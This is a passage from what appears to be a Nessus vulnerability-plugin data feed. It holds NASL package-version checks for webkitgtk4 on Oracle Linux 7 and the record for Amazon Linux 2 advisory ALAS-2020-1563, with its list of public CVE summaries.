script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:webkitgtk4-jsc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:webkitgtk4-jsc-devel\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/local_checks_enabled\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item('Host/OracleLinux')) audit(AUDIT_OS_NOT, 'Oracle Linux');\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, 'Oracle Linux');\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Oracle Linux');\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, 'Oracle Linux 7', 'Oracle Linux ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Oracle Linux', cpu);\n\npkgs = [\n {'reference':'webkitgtk4-2.28.2-2.el7', 'cpu':'aarch64', 'release':'7'},\n {'reference':'webkitgtk4-2.28.2-2.el7', 'cpu':'i686', 'release':'7'},\n {'reference':'webkitgtk4-2.28.2-2.el7', 'cpu':'x86_64', 'release':'7'},\n {'reference':'webkitgtk4-devel-2.28.2-2.el7', 'cpu':'aarch64', 'release':'7'},\n {'reference':'webkitgtk4-devel-2.28.2-2.el7', 'cpu':'i686', 'release':'7'},\n {'reference':'webkitgtk4-devel-2.28.2-2.el7', 'cpu':'x86_64', 'release':'7'},\n {'reference':'webkitgtk4-doc-2.28.2-2.el7', 'release':'7'},\n {'reference':'webkitgtk4-jsc-2.28.2-2.el7', 'cpu':'aarch64', 'release':'7'},\n {'reference':'webkitgtk4-jsc-2.28.2-2.el7', 'cpu':'i686', 'release':'7'},\n {'reference':'webkitgtk4-jsc-2.28.2-2.el7', 'cpu':'x86_64', 'release':'7'},\n {'reference':'webkitgtk4-jsc-devel-2.28.2-2.el7', 'cpu':'aarch64', 'release':'7'},\n {'reference':'webkitgtk4-jsc-devel-2.28.2-2.el7', 'cpu':'i686', 'release':'7'},\n {'reference':'webkitgtk4-jsc-devel-2.28.2-2.el7', 'cpu':'x86_64', 'release':'7'}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n sp = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n epoch = NULL;\n allowmaj = NULL;\n rpm_prefix = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'EL' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (!empty_or_null(package_array['rpm_prefix'])) rpm_prefix = package_array['rpm_prefix'];\n if (reference && release) {\n if (rpm_prefix) {\n if (rpm_exists(release:release, rpm:rpm_prefix) && rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n } else {\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'webkitgtk4 / webkitgtk4-devel / webkitgtk4-doc / etc');\n}", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T14:12:39", "description": "The version of tested product installed on the remote host is prior to tested version. It is, therefore, affected by multiple vulnerabilities as referenced in the ALAS2-2020-1563 advisory.\n\n - A spoofing vulnerability exists when Microsoft Edge does not properly parse HTTP content, aka Microsoft Edge Spoofing Vulnerability. This affects Microsoft Edge. This CVE ID is unique from CVE-2018-8388.\n (CVE-2018-8383)\n\n - WebKitGTK and WPE WebKit prior to version 2.24.1 failed to properly apply configured HTTP proxy settings when downloading livestream video (HLS, DASH, or Smooth Streaming), an error resulting in deanonymization.\n This issue was corrected by changing the way livestreams are downloaded. (CVE-2019-11070)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 12.3, macOS Mojave 10.14.5, tvOS 12.3, Safari 12.1.1, iTunes for Windows 12.9.5, iCloud for Windows 7.12.\n Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-6237, CVE-2019-8584, CVE-2019-8586, CVE-2019-8587, CVE-2019-8594, CVE-2019-8595, CVE-2019-8596, CVE-2019-8609, CVE-2019-8610, CVE-2019-8611, CVE-2019-8615, CVE-2019-8619)\n\n - WebKitGTK and WPE WebKit prior to version 2.24.1 are vulnerable to address bar spoofing upon certain JavaScript redirections. An attacker could cause malicious web content to be displayed as if for a trusted URI. This is similar to the CVE-2018-8383 issue in Microsoft Edge. (CVE-2019-6251)\n\n - A type confusion issue was addressed with improved memory handling. This issue is fixed in iOS 12.2, tvOS 12.2, watchOS 5.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8506)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 12.2, tvOS 12.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8524)\n\n - A memory corruption issue was addressed with improved state management. This issue is fixed in iOS 12.2, tvOS 12.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8535)\n\n - A memory corruption issue was addressed with improved memory handling. This issue is fixed in iOS 12.2, tvOS 12.2, watchOS 5.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8536, CVE-2019-8544)\n\n - A logic issue was addressed with improved validation. This issue is fixed in iOS 12.2, tvOS 12.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. Processing maliciously crafted web content may lead to universal cross site scripting. (CVE-2019-8551)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 12.2, tvOS 12.2, watchOS 5.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8558, CVE-2019-8559, CVE-2019-8563)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 12.3, macOS Mojave 10.14.5, tvOS 12.3, watchOS 5.2.1, Safari 12.1.1, iTunes for Windows 12.9.5, iCloud for Windows 7.12. Processing maliciously crafted web content may lead to arbitrary code execution.\n (CVE-2019-8583, CVE-2019-8601, CVE-2019-8622, CVE-2019-8623)\n\n - A logic issue was addressed with improved state management. This issue is fixed in tvOS 13, iTunes for Windows 12.10.1, iCloud for Windows 10.7, iCloud for Windows 7.14. Processing maliciously crafted web content may lead to universal cross site scripting. (CVE-2019-8625, CVE-2019-8719)\n\n - A logic issue existed in the handling of synchronous page loads. This issue was addressed with improved state management. This issue is fixed in iOS 12.4, macOS Mojave 10.14.6, tvOS 12.4, Safari 12.1.2, iTunes for Windows 12.9.6, iCloud for Windows 7.13, iCloud for Windows 10.6. Processing maliciously crafted web content may lead to universal cross site scripting. (CVE-2019-8649)\n\n - A logic issue was addressed with improved state management. This issue is fixed in iOS 12.4, macOS Mojave 10.14.6, tvOS 12.4, watchOS 5.3, Safari 12.1.2, iTunes for Windows 12.9.6, iCloud for Windows 7.13, iCloud for Windows 10.6. Processing maliciously crafted web content may lead to universal cross site scripting.\n (CVE-2019-8658)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 12.4, macOS Mojave 10.14.6, tvOS 12.4, Safari 12.1.2, iTunes for Windows 12.9.6, iCloud for Windows 7.13, iCloud for Windows 10.6. Processing maliciously crafted web content may lead to arbitrary code execution.\n (CVE-2019-8666, CVE-2019-8671, CVE-2019-8673, CVE-2019-8677, CVE-2019-8678, CVE-2019-8679, CVE-2019-8680, CVE-2019-8681, CVE-2019-8686, CVE-2019-8687)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 12.4, macOS Mojave 10.14.6, tvOS 12.4, watchOS 5.3, Safari 12.1.2, iTunes for Windows 12.9.6, iCloud for Windows 7.13, iCloud for Windows 10.6. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8669, CVE-2019-8672, CVE-2019-8676, CVE-2019-8683, CVE-2019-8688, CVE-2019-8689)\n\n - A logic issue was addressed with improved state management. This issue is fixed in iOS 13, Safari 13.\n Processing maliciously crafted web content may lead to universal cross site scripting. (CVE-2019-8674)\n\n - A logic issue existed in the handling of document loads. This issue was addressed with improved state management. This issue is fixed in iOS 12.4, macOS Mojave 10.14.6, tvOS 12.4, Safari 12.1.2, iTunes for Windows 12.9.6, iCloud for Windows 7.13, iCloud for Windows 10.6. Processing maliciously crafted web content may lead to universal cross site scripting. (CVE-2019-8690)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in tvOS 13, iTunes for Windows 12.10.1, iCloud for Windows 10.7, iCloud for Windows 7.14. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8707, CVE-2019-8726, CVE-2019-8733, CVE-2019-8735)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iCloud for Windows 11.0. Processing maliciously crafted web content may lead to arbitrary code execution.\n (CVE-2019-8710)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in watchOS 6.1. Processing maliciously crafted web content may lead to arbitrary code execution.\n (CVE-2019-8743, CVE-2019-8765)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 13.1 and iPadOS 13.1, tvOS 13, Safari 13.0.1, iTunes for Windows 12.10.1, iCloud for Windows 10.7, iCloud for Windows 7.14. Processing maliciously crafted web content may lead to arbitrary code execution.\n (CVE-2019-8763)\n\n - A logic issue was addressed with improved state management. This issue is fixed in watchOS 6.1. Processing maliciously crafted web content may lead to universal cross site scripting. (CVE-2019-8764)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in watchOS 6.1, iCloud for Windows 11.0. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8766)\n\n - Clear History and Website Data did not clear the history. The issue was addressed with improved data deletion. This issue is fixed in macOS Catalina 10.15. A user may be unable to delete browsing history items. (CVE-2019-8768)\n\n - An issue existed in the drawing of web page elements. The issue was addressed with improved logic. This issue is fixed in iOS 13.1 and iPadOS 13.1, macOS Catalina 10.15. Visiting a maliciously crafted website may reveal browsing history. (CVE-2019-8769)\n\n - This issue was addressed with improved iframe sandbox enforcement. This issue is fixed in Safari 13.0.1, iOS 13. Maliciously crafted web content may violate iframe sandboxing policy. (CVE-2019-8771)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 13.2 and iPadOS 13.2, tvOS 13.2, Safari 13.0.3, iTunes for Windows 12.10.2, iCloud for Windows 11.0.\n Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8782)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 13.2 and iPadOS 13.2, tvOS 13.2, Safari 13.0.3, iTunes for Windows 12.10.2, iCloud for Windows 11.0, iCloud for Windows 7.15. Processing maliciously crafted web content may lead to arbitrary code execution.\n (CVE-2019-8783, CVE-2019-8814, CVE-2019-8815, CVE-2019-8819, CVE-2019-8821, CVE-2019-8822, CVE-2019-8823)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 13.2 and iPadOS 13.2, tvOS 13.2, watchOS 6.1, Safari 13.0.3, iTunes for Windows 12.10.2. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8808, CVE-2019-8812)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 13.2 and iPadOS 13.2, tvOS 13.2, watchOS 6.1, Safari 13.0.3, iTunes for Windows 12.10.2, iCloud for Windows 11.0, iCloud for Windows 7.15. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8811, CVE-2019-8816, CVE-2019-8820)\n\n - A logic issue was addressed with improved state management. This issue is fixed in iOS 13.2 and iPadOS 13.2, tvOS 13.2, Safari 13.0.3, iTunes for Windows 12.10.2, iCloud for Windows 11.0. Processing maliciously crafted web content may lead to universal cross site scripting. (CVE-2019-8813)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in tvOS 13.3, iCloud for Windows 10.9, iOS 13.3 and iPadOS 13.3, Safari 13.0.4, iTunes 12.10.3 for Windows, iCloud for Windows 7.16. Processing maliciously crafted web content may lead to arbitrary code execution.\n (CVE-2019-8835)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in tvOS 13.3, watchOS 6.1.1, iCloud for Windows 10.9, iOS 13.3 and iPadOS 13.3, Safari 13.0.4, iTunes 12.10.3 for Windows, iCloud for Windows 7.16. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8844)\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in tvOS 13.3, iCloud for Windows 10.9, iOS 13.3 and iPadOS 13.3, Safari 13.0.4, iTunes 12.10.3 for Windows, iCloud for Windows 7.16. Processing maliciously crafted web content may lead to arbitrary code execution.\n (CVE-2019-8846)\n\n - WebKitGTK through 2.26.4 and WPE WebKit through 2.26.4 (which are the versions right before 2.28.0) contains a memory corruption issue (use-after-free) that may lead to arbitrary code execution. This issue has been fixed in 2.28.0 with improved memory handling. (CVE-2020-10018)\n\n - A use-after-free issue exists in WebKitGTK before 2.28.1 and WPE WebKit before 2.28.1 via crafted web content that allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash). (CVE-2020-11793)\n\n - A denial of service issue was addressed with improved memory handling. This issue is fixed in iOS 13.3.1 and iPadOS 13.3.1, tvOS 13.3.1, Safari 13.0.5, iTunes for Windows 12.10.4, iCloud for Windows 11.0, iCloud for Windows 7.17. A malicious website may be able to cause a denial of service. (CVE-2020-3862)\n\n - A logic issue was addressed with improved validation. This issue is fixed in iCloud for Windows 7.17, iTunes 12.10.4 for Windows, iCloud for Windows 10.9.2, tvOS 13.3.1, Safari 13.0.5, iOS 13.3.1 and iPadOS 13.3.1. A DOM object context may not have had a unique security origin. (CVE-2020-3864)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 13.3.1 and iPadOS 13.3.1, tvOS 13.3.1, Safari 13.0.5, iTunes for Windows 12.10.4, iCloud for Windows 11.0, iCloud for Windows 7.17. Processing maliciously crafted web content may lead to arbitrary code execution.\n (CVE-2020-3865, CVE-2020-3868)\n\n - A logic issue was addressed with improved state management. This issue is fixed in iOS 13.3.1 and iPadOS 13.3.1, tvOS 13.3.1, Safari 13.0.5, iTunes for Windows 12.10.4, iCloud for Windows 11.0, iCloud for Windows 7.17. Processing maliciously crafted web content may lead to universal cross site scripting.\n (CVE-2020-3867)\n\n - A logic issue was addressed with improved restrictions. This issue is fixed in iOS 13.4 and iPadOS 13.4, tvOS 13.4, Safari 13.1, iTunes for Windows 12.10.5, iCloud for Windows 10.9.3, iCloud for Windows 7.18. A file URL may be incorrectly processed. (CVE-2020-3885)\n\n - A race condition was addressed with additional validation. This issue is fixed in iOS 13.4 and iPadOS 13.4, tvOS 13.4, Safari 13.1, iTunes for Windows 12.10.5, iCloud for Windows 10.9.3, iCloud for Windows 7.18. An application may be able to read restricted memory. (CVE-2020-3894)\n\n - A memory corruption issue was addressed with improved memory handling. This issue is fixed in iOS 13.4 and iPadOS 13.4, tvOS 13.4, watchOS 6.2, Safari 13.1, iTunes for Windows 12.10.5, iCloud for Windows 10.9.3, iCloud for Windows 7.18. Processing maliciously crafted web content may lead to arbitrary code execution.\n (CVE-2020-3895, CVE-2020-3900)\n\n - A type confusion issue was addressed with improved memory handling. This issue is fixed in iOS 13.4 and iPadOS 13.4, tvOS 13.4, watchOS 6.2, Safari 13.1, iTunes for Windows 12.10.5, iCloud for Windows 10.9.3, iCloud for Windows 7.18. A remote attacker may be able to cause arbitrary code execution. (CVE-2020-3897)\n\n - A memory consumption issue was addressed with improved memory handling. This issue is fixed in iOS 13.4 and iPadOS 13.4, tvOS 13.4, watchOS 6.2, Safari 13.1, iTunes for Windows 12.10.5, iCloud for Windows 10.9.3, iCloud for Windows 7.18. A remote attacker may be able to cause arbitrary code execution.\n (CVE-2020-3899)\n\n - A type confusion issue was addressed with improved memory handling. This issue is fixed in iOS 13.4 and iPadOS 13.4, tvOS 13.4, watchOS 6.2, Safari 13.1, iTunes for Windows 12.10.5, iCloud for Windows 10.9.3, iCloud for Windows 7.18. Processing maliciously crafted web content may lead to arbitrary code execution.\n (CVE-2020-3901)\n\n - An input validation issue was addressed with improved input validation. This issue is fixed in iOS 13.4 and iPadOS 13.4, tvOS 13.4, Safari 13.1, iTunes for Windows 12.10.5, iCloud for Windows 10.9.3, iCloud for Windows 7.18. Processing maliciously crafted web content may lead to a cross site scripting attack.\n (CVE-2020-3902)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2020-11-11T00:00:00", "type": "nessus", "title": "Amazon Linux 2 : webkitgtk4 (ALAS-2020-1563)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-8383", "CVE-2018-8388", "CVE-2019-11070", "CVE-2019-6237", "CVE-2019-6251", "CVE-2019-8506", "CVE-2019-8524", "CVE-2019-8535", "CVE-2019-8536", "CVE-2019-8544", "CVE-2019-8551", "CVE-2019-8558", "CVE-2019-8559", "CVE-2019-8563", "CVE-2019-8571", "CVE-2019-8583", "CVE-2019-8584", "CVE-2019-8586", "CVE-2019-8587", "CVE-2019-8594", "CVE-2019-8595", "CVE-2019-8596", "CVE-2019-8597", "CVE-2019-8601", "CVE-2019-8607", "CVE-2019-8608", "CVE-2019-8609", "CVE-2019-8610", "CVE-2019-8611", "CVE-2019-8615", "CVE-2019-8619", "CVE-2019-8622", "CVE-2019-8623", "CVE-2019-8625", "CVE-2019-8644", "CVE-2019-8649", "CVE-2019-8658", "CVE-2019-8666", "CVE-2019-8669", "CVE-2019-8671", "CVE-2019-8672", "CVE-2019-8673", "CVE-2019-8674", "CVE-2019-8676", "CVE-2019-8677", "CVE-2019-8678", "CVE-2019-8679", "CVE-2019-8680", "CVE-2019-8681", "CVE-2019-8683", "CVE-2019-8684", "CVE-2019-8686", "CVE-2019-8687", "CVE-2019-8688", "CVE-2019-8689", "CVE-2019-8690", "CVE-2019-8707", "CVE-2019-8710", "CVE-2019-8719", "CVE-2019-8720", "CVE-2019-8726", "CVE-2019-8733", "CVE-2019-8735", "CVE-2019-8743", "CVE-2019-8763", "CVE-2019-8764", "CVE-2019-8765", "CVE-2019-8766", "CVE-2019-8768", "CVE-2019-8769", "CVE-2019-8771", "CVE-2019-8782", "CVE-2019-8783", "CVE-2019-8808", "CVE-2019-8811", "CVE-2019-8812", "CVE-2019-8813", "CVE-2019-8814", "CVE-2019-8815", "CVE-2019-8816", "CVE-2019-8819", "CVE-2019-8820", "CVE-2019-8821", "CVE-2019-8822", "CVE-2019-8823", "CVE-2019-8835", "CVE-2019-8844", "CVE-2019-8846", "CVE-2020-10018", "CVE-2020-11793", "CVE-2020-3862", "CVE-2020-3864", "CVE-2020-3865", "CVE-2020-3867", "CVE-2020-3868", "CVE-2020-3885", "CVE-2020-3894", "CVE-2020-3895", "CVE-2020-3897", "CVE-2020-3899", "CVE-2020-3900", "CVE-2020-3901", "CVE-2020-3902"], "modified": "2022-05-25T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:webkitgtk4", "p-cpe:/a:amazon:linux:webkitgtk4-debuginfo", "p-cpe:/a:amazon:linux:webkitgtk4-devel", "p-cpe:/a:amazon:linux:webkitgtk4-doc", "p-cpe:/a:amazon:linux:webkitgtk4-jsc", "p-cpe:/a:amazon:linux:webkitgtk4-jsc-devel", "cpe:/o:amazon:linux:2"], "id": "AL2_ALAS-2020-1563.NASL", "href": "https://www.tenable.com/plugins/nessus/142737", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n# \n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux 2 Security Advisory ALAS-2020-1563.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(142737);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/25\");\n\n script_cve_id(\n \"CVE-2018-8383\",\n \"CVE-2019-6237\",\n \"CVE-2019-6251\",\n \"CVE-2019-8506\",\n \"CVE-2019-8524\",\n \"CVE-2019-8535\",\n \"CVE-2019-8536\",\n \"CVE-2019-8544\",\n \"CVE-2019-8551\",\n \"CVE-2019-8558\",\n \"CVE-2019-8559\",\n \"CVE-2019-8563\",\n \"CVE-2019-8571\",\n \"CVE-2019-8583\",\n \"CVE-2019-8584\",\n \"CVE-2019-8586\",\n \"CVE-2019-8587\",\n \"CVE-2019-8594\",\n \"CVE-2019-8595\",\n \"CVE-2019-8596\",\n \"CVE-2019-8597\",\n \"CVE-2019-8601\",\n \"CVE-2019-8607\",\n \"CVE-2019-8608\",\n \"CVE-2019-8609\",\n \"CVE-2019-8610\",\n \"CVE-2019-8611\",\n \"CVE-2019-8615\",\n \"CVE-2019-8619\",\n \"CVE-2019-8622\",\n \"CVE-2019-8623\",\n \"CVE-2019-8625\",\n \"CVE-2019-8644\",\n \"CVE-2019-8649\",\n \"CVE-2019-8658\",\n \"CVE-2019-8666\",\n \"CVE-2019-8669\",\n \"CVE-2019-8671\",\n \"CVE-2019-8672\",\n \"CVE-2019-8673\",\n \"CVE-2019-8674\",\n \"CVE-2019-8676\",\n \"CVE-2019-8677\",\n \"CVE-2019-8678\",\n \"CVE-2019-8679\",\n \"CVE-2019-8680\",\n \"CVE-2019-8681\",\n \"CVE-2019-8683\",\n \"CVE-2019-8684\",\n \"CVE-2019-8686\",\n \"CVE-2019-8687\",\n \"CVE-2019-8688\",\n \"CVE-2019-8689\",\n \"CVE-2019-8690\",\n \"CVE-2019-8707\",\n \"CVE-2019-8710\",\n \"CVE-2019-8719\",\n \"CVE-2019-8720\",\n \"CVE-2019-8726\",\n \"CVE-2019-8733\",\n \"CVE-2019-8735\",\n \"CVE-2019-8743\",\n \"CVE-2019-8763\",\n \"CVE-2019-8764\",\n \"CVE-2019-8765\",\n \"CVE-2019-8766\",\n \"CVE-2019-8768\",\n \"CVE-2019-8769\",\n \"CVE-2019-8771\",\n \"CVE-2019-8782\",\n \"CVE-2019-8783\",\n \"CVE-2019-8808\",\n \"CVE-2019-8811\",\n \"CVE-2019-8812\",\n \"CVE-2019-8813\",\n \"CVE-2019-8814\",\n \"CVE-2019-8815\",\n \"CVE-2019-8816\",\n \"CVE-2019-8819\",\n \"CVE-2019-8820\",\n \"CVE-2019-8821\",\n \"CVE-2019-8822\",\n \"CVE-2019-8823\",\n \"CVE-2019-8835\",\n \"CVE-2019-8844\",\n \"CVE-2019-8846\",\n \"CVE-2019-11070\",\n \"CVE-2020-3862\",\n \"CVE-2020-3864\",\n \"CVE-2020-3865\",\n \"CVE-2020-3867\",\n \"CVE-2020-3868\",\n \"CVE-2020-3885\",\n \"CVE-2020-3894\",\n \"CVE-2020-3895\",\n \"CVE-2020-3897\",\n \"CVE-2020-3899\",\n \"CVE-2020-3900\",\n \"CVE-2020-3901\",\n \"CVE-2020-3902\",\n \"CVE-2020-10018\",\n \"CVE-2020-11793\"\n );\n script_bugtraq_id(\n 105024,\n 108497,\n 108566,\n 109328,\n 109329\n );\n script_xref(name:\"ALAS\", value:\"2020-1563\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/25\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/13\");\n\n script_name(english:\"Amazon Linux 2 : webkitgtk4 (ALAS-2020-1563)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Amazon Linux 2 host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of tested product installed on the remote host is prior to tested version. It is, therefore, affected by\nmultiple vulnerabilities as referenced in the ALAS2-2020-1563 advisory.\n\n - A spoofing vulnerability exists when Microsoft Edge does not properly parse HTTP content, aka Microsoft\n Edge Spoofing Vulnerability. This affects Microsoft Edge. This CVE ID is unique from CVE-2018-8388.\n (CVE-2018-8383)\n\n - WebKitGTK and WPE WebKit prior to version 2.24.1 failed to properly apply configured HTTP proxy settings\n when downloading livestream video (HLS, DASH, or Smooth Streaming), an error resulting in deanonymization.\n This issue was corrected by changing the way livestreams are downloaded. (CVE-2019-11070)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS\n 12.3, macOS Mojave 10.14.5, tvOS 12.3, Safari 12.1.1, iTunes for Windows 12.9.5, iCloud for Windows 7.12.\n Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-6237,\n CVE-2019-8584, CVE-2019-8586, CVE-2019-8587, CVE-2019-8594, CVE-2019-8595, CVE-2019-8596, CVE-2019-8609,\n CVE-2019-8610, CVE-2019-8611, CVE-2019-8615, CVE-2019-8619)\n\n - WebKitGTK and WPE WebKit prior to version 2.24.1 are vulnerable to address bar spoofing upon certain\n JavaScript redirections. An attacker could cause malicious web content to be displayed as if for a trusted\n URI. This is similar to the CVE-2018-8383 issue in Microsoft Edge. (CVE-2019-6251)\n\n - A type confusion issue was addressed with improved memory handling. This issue is fixed in iOS 12.2, tvOS\n 12.2, watchOS 5.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. Processing maliciously\n crafted web content may lead to arbitrary code execution. (CVE-2019-8506)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS\n 12.2, tvOS 12.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. Processing maliciously\n crafted web content may lead to arbitrary code execution. (CVE-2019-8524)\n\n - A memory corruption issue was addressed with improved state management. This issue is fixed in iOS 12.2,\n tvOS 12.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. Processing maliciously crafted\n web content may lead to arbitrary code execution. (CVE-2019-8535)\n\n - A memory corruption issue was addressed with improved memory handling. This issue is fixed in iOS 12.2,\n tvOS 12.2, watchOS 5.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. Processing\n maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8536, CVE-2019-8544)\n\n - A logic issue was addressed with improved validation. This issue is fixed in iOS 12.2, tvOS 12.2, Safari\n 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. Processing maliciously crafted web content may\n lead to universal cross site scripting. (CVE-2019-8551)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS\n 12.2, tvOS 12.2, watchOS 5.2, Safari 12.1, iTunes 12.9.4 for Windows, iCloud for Windows 7.11. Processing\n maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8558, CVE-2019-8559,\n CVE-2019-8563)\n\n - Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS\n 12.3, macOS Mojave 10.14.5, tvOS 12.3, watchOS 5.2.1, Safari 12.1.1, iTunes for Windows 12.9.5, iCloud for\n Windows 7.12. Processing maliciously crafted web content may lead to arbitrary code execution.\n (CVE-2019-8583, CVE-2019-8601, CVE-2019-8622, CVE-2019-8623)\n\n - A logic issue was addressed with improved state management. This issue is fixed in tvOS 13, iTunes for\n Windows 12.10.1, iCloud for Windows 10.7, iCloud for Windows 7.14. Processing maliciously crafted web\n content may lead to universal cross site scripting. (CVE-2019-8625, CVE-2019-8719)\n\n - A logic issue existed in the handling of synchronous page loads. This issue was addressed with improved\n state management. This issue is fixed in iOS 12.4, macOS Mojave 10.14.6, tvOS 12.4, Safari 12.1.2, iTunes\n for Windows 12.9.6, iCloud for Windows 7.13, iCloud for Windows 10.6. Processing maliciously crafted web\n content may lead to universal cross site scripting. 